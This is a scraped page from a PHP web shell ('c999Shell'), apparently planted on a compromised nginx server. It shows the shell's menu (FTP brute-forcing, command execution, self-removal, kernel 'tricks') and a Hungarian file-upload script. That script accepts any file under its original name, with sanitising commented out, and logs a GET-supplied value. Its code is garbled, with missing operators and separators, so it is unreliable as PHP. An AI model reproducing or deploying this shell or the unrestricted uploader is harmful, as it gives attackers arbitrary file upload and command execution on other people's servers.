!c999Shell v. 1.0 pre-release build #16!

Software: nginx. PHP/5.2.17 

uname -a: Linux hosting 2.6 #1 i686 

 

Safe-mode: OFF (not secure)

/   drwxr-xr-x
Free of (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     file.php (1.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start();
if(empty($_SESSION["sid"]))$_SESSION["sid"]="nincs";
if(isset($_GET[a]))$_SESSION["sid"]=$_GET[a];

print('<center>');

print('
<form name=form1 enctype=multipart/form-data method=POST  action=>
<input type=hidden name=MAX_FILE_SIZE value=4000000>
<input type=file name=file  size=30 style="font-family:tahoma;  background-color:#d38569; border:1px solid #d99780; color:#bb4419">
<input type=Submit value=Feltöltés style=" font-family:tahoma;  background-color:#d38569; border:1px solid #d99780; color:#bb4419">
</form>');



$type $_FILES['file']['type'];

$mappa "files/";
$datatest=$_FILES['file']['name'];
//$datatest = eregi_replace ("([^a-zA-Z.]|[[:space:]])+","_", $datatest);
if($_FILES['file']['tmp_name'] != "")
    {

    if (move_uploaded_file($_FILES['file']['tmp_name'],$mappa.$datatest))
        {
        print "
<font color=#bb4419 face=tahoma>Sikeres fájlfeltöltés!<br>";
file_put_contents("logg.txt"$_SESSION["sid"], FILE_APPEND LOCK_EX);
        }
      else
        {
        print "
<font color=#bb4419 face=tahoma>Sikertelen!";
        }
    }
$dir "./files";
$dh opendir($dir);
while (false !== ($filename readdir($dh))) {
if (!is_dir($dir."/".$filename)) {
echo "<a href=".$dir."/".$filename." target=_blank >".$filename."</a>";



echo "<br>";



}
}

print_r($_FILES);

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::